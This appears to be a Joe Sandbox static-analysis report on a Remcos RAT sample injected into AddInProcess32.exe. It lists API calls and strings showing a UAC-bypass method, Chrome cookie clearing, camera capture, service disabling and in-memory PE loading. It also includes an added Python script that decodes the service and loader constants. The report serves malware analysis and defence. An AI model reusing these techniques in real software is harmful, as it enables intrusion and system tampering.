                                                                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                  • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                  APIs
                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 0040760B
                                                                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                  • CoUninitialize.OLE32 ref: 00407664
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                  • API String ID: 3851391207-3324213274
                                                                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                  APIs
                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                  Strings
                                                                                                  • UserProfile, xrefs: 0040BAE8
                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                  • API String ID: 2018770650-304995407
                                                                                                  • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                  • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                  APIs
                                                                                                  • AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Console$AllocOutputShowWindow
                                                                                                  • String ID: Remcos v$5.2.0 Pro$CONOUT$
                                                                                                  • API String ID: 2425139147-793934204
                                                                                                  • Opcode ID: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                  • Instruction ID: a031bdd2f27af694b11ce09d1e3c688e218bb3586dee27dfc95755d0e541b829
                                                                                                  • Opcode Fuzzy Hash: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                  • Instruction Fuzzy Hash: 2D014471A80304BBD610F7F19D8BF9EB7AC9B18B05F500527BA04A70D2EB6DD944466E
                                                                                                  Strings
                                                                                                  • 0SG, xrefs: 00407715
                                                                                                  • RG, xrefs: 004076DF
                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 004076FF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$RG
                                                                                                  • API String ID: 0-2653435807
                                                                                                  • Opcode ID: 6266df8f63f07d9ec3e284de14b260bcf750c81262affdfdd67307fbc2c8eb3d
                                                                                                  • Instruction ID: 8e81a4762a03630119b5543cf4782e43f3d691fcab72f30749e56a9243805afb
                                                                                                  • Opcode Fuzzy Hash: 6266df8f63f07d9ec3e284de14b260bcf750c81262affdfdd67307fbc2c8eb3d
                                                                                                  • Instruction Fuzzy Hash: 08F0F6B0A14141ABCB1067355D286AA3756A784397F00487BF547FB2F2EBBD5C82861E
                                                                                                  APIs
                                                                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                  • __allrem.LIBCMT ref: 0043AD51
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1992179935-0
                                                                                                  • Opcode ID: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                  • Opcode Fuzzy Hash: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: H_prologSleep
                                                                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$XNG
                                                                                                  • API String ID: 3469354165-985523790
                                                                                                  • Opcode ID: 4df218fd7deca31707e20cb0c84980cf95b97fad70d0848b7f6c12c419eef87e
                                                                                                  • Instruction ID: 7593a199e81997f2aad1dc538160579efde4e563a54277089fa649d8e7e3dbe8
                                                                                                  • Opcode Fuzzy Hash: 4df218fd7deca31707e20cb0c84980cf95b97fad70d0848b7f6c12c419eef87e
                                                                                                  • Instruction Fuzzy Hash: 2A51E0B1A042106BCA14FB369D0A66E3655ABC4748F00443FFA09676E2DF7D8E46839E
                                                                                                  APIs
                                                                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                  • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                                                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                                                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3950776272-0
                                                                                                  • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                  • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe
                                                                                                  • String ID:
                                                                                                  • API String ID: 4189289331-0
                                                                                                  • Opcode ID: dfe269b3e7c89c95b27fedd159a696e88b5656ec827068c0169833f59e794ee9
                                                                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                  • Opcode Fuzzy Hash: dfe269b3e7c89c95b27fedd159a696e88b5656ec827068c0169833f59e794ee9
                                                                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                  • String ID:
                                                                                                  • API String ID: 493672254-0
                                                                                                  • Opcode ID: 6768d04de6bba430942b0409d96819e7e0e6ab90830dc8ea3fc78fe1771b3c5b
                                                                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                  • Opcode Fuzzy Hash: 6768d04de6bba430942b0409d96819e7e0e6ab90830dc8ea3fc78fe1771b3c5b
                                                                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                  • _free.LIBCMT ref: 004482CC
                                                                                                  • _free.LIBCMT ref: 004482F4
                                                                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
                                                                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                  • _abort.LIBCMT ref: 00448313
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 3160817290-0
                                                                                                  • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                  • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                  • String ID:
                                                                                                  • API String ID: 221034970-0
                                                                                                  • Opcode ID: ae1d2dc5fcc920fa0c4de2805c4bb02fd0d2400c89c15f2023f51b2330037a2a
                                                                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                  • Opcode Fuzzy Hash: ae1d2dc5fcc920fa0c4de2805c4bb02fd0d2400c89c15f2023f51b2330037a2a
                                                                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                  • String ID:
                                                                                                  • API String ID: 221034970-0
                                                                                                  • Opcode ID: 09157ef8eb8da34f78b0ee302db87b690a61261d17d0987fe2a8bb4e8e1c1ff6
                                                                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                  • Opcode Fuzzy Hash: 09157ef8eb8da34f78b0ee302db87b690a61261d17d0987fe2a8bb4e8e1c1ff6
                                                                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                  • String ID:
                                                                                                  • API String ID: 221034970-0
                                                                                                  • Opcode ID: b26bf3762530a856ab6d8755ba7de06de94296f9b4710ed3a1167deef3457c09
                                                                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                  • Opcode Fuzzy Hash: b26bf3762530a856ab6d8755ba7de06de94296f9b4710ed3a1167deef3457c09
                                                                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
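The four ADVAPI32 blocks above (refs 0041AD19, 0041AB46, 0041AC4A, 0041ACB1) are service-tampering routines, and the KERNEL32 block at ref 00411D72 (SetLastError / GetNativeSystemInfo / VirtualAlloc / HeapAlloc) has the shape of a manual in-memory PE mapper rather than a LoadLibrary call. The listing only shows the recovered immediates as raw hex, so the script below, an added example that is not part of the Joe Sandbox report, parses API bullets in the report's own line format and names the constants: OpenServiceW access masks (0x2 SERVICE_CHANGE_CONFIG, 0x20 SERVICE_STOP, 0x40 SERVICE_PAUSE_CONTINUE), ControlService control codes (1 STOP, 2 PAUSE, 3 CONTINUE), the ChangeServiceConfigW start type (4 SERVICE_DISABLED) and the SetLastError codes a hand-rolled loader sets (0xC1 ERROR_BAD_EXE_FORMAT, 0xE ERROR_OUTOFMEMORY, 0x45A ERROR_DLL_INIT_FAILED). The sample input is copied from the blocks above; the loader heuristic is this example's own rule of thumb, not a Joe Sandbox signature. Caveat: the argument values in these listings come from static analysis, so only the leading positional arguments are meaningful and anything past the API's real parameter count is stack residue; confirm a decoded value in the disassembly before putting it in a report.

```python
import re
from dataclasses import dataclass

# One Joe Sandbox API bullet, e.g.
#   "• ControlService.ADVAPI32(00000000,00000001,?,?), ref: 0041AB76"
# Bullets prefixed "Part of subcall function ..." belong to a callee and are flagged.
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>[A-Za-z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Win32 constants (winsvc.h / winerror.h).
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
START_TYPE = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
              3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
SERVICE_ACCESS = [(0x1, "SERVICE_QUERY_CONFIG"), (0x2, "SERVICE_CHANGE_CONFIG"),
                  (0x4, "SERVICE_QUERY_STATUS"), (0x8, "SERVICE_ENUMERATE_DEPENDENTS"),
                  (0x10, "SERVICE_START"), (0x20, "SERVICE_STOP"),
                  (0x40, "SERVICE_PAUSE_CONTINUE"), (0x80, "SERVICE_INTERROGATE"),
                  (0x100, "SERVICE_USER_DEFINED_CONTROL")]
LOADER_ERRORS = {0xD: "ERROR_INVALID_DATA", 0xE: "ERROR_OUTOFMEMORY",
                 0xC1: "ERROR_BAD_EXE_FORMAT", 0x45A: "ERROR_DLL_INIT_FAILED"}


@dataclass
class ApiRef:
    api: str
    module: str
    args: list      # int for a recovered immediate, None for '?' or a string literal
    ref: int
    subcall: bool   # True for "Part of subcall function" bullets


def parse_api_refs(text):
    """Parse the 'APIs' bullets of one function block into ApiRef records."""
    refs = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = []
        for raw in m.group("args").split(","):
            raw = raw.strip()
            if raw == "":
                continue
            try:
                args.append(int(raw, 16))
            except ValueError:
                args.append(None)       # '?' (not recovered) or a string argument
        refs.append(ApiRef(m.group("api"), m.group("mod"), args,
                           int(m.group("ref"), 16), "Part of subcall" in line))
    return refs


def access_names(mask):
    names = [name for bit, name in SERVICE_ACCESS if mask & bit]
    return names or [hex(mask)]


def decode_service_ops(refs):
    """Name the service operations a function performs, using only the positional
    arguments that exist in the real API signature (everything later is stack noise)."""
    ops = []
    for r in refs:
        if r.subcall or r.module != "ADVAPI32":
            continue
        if r.api == "OpenServiceW" and len(r.args) > 2 and r.args[2] is not None:
            ops.append("OpenServiceW(%s)" % "|".join(access_names(r.args[2])))   # dwDesiredAccess
        elif r.api == "ControlService" and len(r.args) > 1 and r.args[1] is not None:
            ops.append("ControlService(%s)" % SERVICE_CONTROL.get(r.args[1], hex(r.args[1])))
        elif r.api == "ChangeServiceConfigW" and len(r.args) > 2 and r.args[2] is not None:
            ops.append("ChangeServiceConfigW(dwStartType=%s)"                    # 3rd param
                       % START_TYPE.get(r.args[2], hex(r.args[2])))
    return ops


def looks_like_inmemory_pe_loader(refs):
    """Heuristic (this example's own): the function rejects input with ERROR_BAD_EXE_FORMAT,
    maps memory itself (VirtualAlloc plus HeapAlloc or GetNativeSystemInfo for the page
    size) and reports ERROR_DLL_INIT_FAILED, i.e. it loads a PE without LoadLibrary."""
    errors = {r.args[0] for r in refs if r.api == "SetLastError" and r.args and r.args[0] is not None}
    apis = {r.api for r in refs}
    return (0xC1 in errors and 0x45A in errors and "VirtualAlloc" in apis
            and ("HeapAlloc" in apis or "GetNativeSystemInfo" in apis))


def triage(blocks):
    """Summarise {name: api_listing} into named service operations and the loader flag."""
    out = {}
    for name, text in blocks.items():
        refs = parse_api_refs(text)
        out[name] = {"service_ops": decode_service_ops(refs),
                     "inmemory_pe_loader": looks_like_inmemory_pe_loader(refs)}
    return out


# Sample input: API bullets copied from the function blocks of this report.
SAMPLES = {
    "loader_00411D72": """
  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
• SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
• GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
• SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
• HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
""",
    "disable_0041AD19": """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
""",
    "stop_0041AB46": """
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
""",
    "pause_0041AC4A": """
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
""",
}

if __name__ == "__main__":
    for name, summary in triage(SAMPLES).items():
        print(name, summary)
```

The access mask handed to OpenServiceW is the more reliable of the two signals, because it must match the operation for the call to succeed: a routine that opens with SERVICE_CHANGE_CONFIG and then passes start type 4 is disabling the target service, and one that opens with SERVICE_STOP and sends control code 1 is stopping it. The dwServiceType / dwErrorControl values that the listing prints as 000000FF are left undecoded on purpose; the listing's rendering of that immediate is not something to name without checking the instruction.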
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID: @^E
                                                                                                  • API String ID: 269201875-2908066071
                                                                                                  • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                  • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00443515
                                                                                                  • _free.LIBCMT ref: 004435E0
                                                                                                  • _free.LIBCMT ref: 004435EA
                                                                                                  Strings
                                                                                                  Memory Dump Source
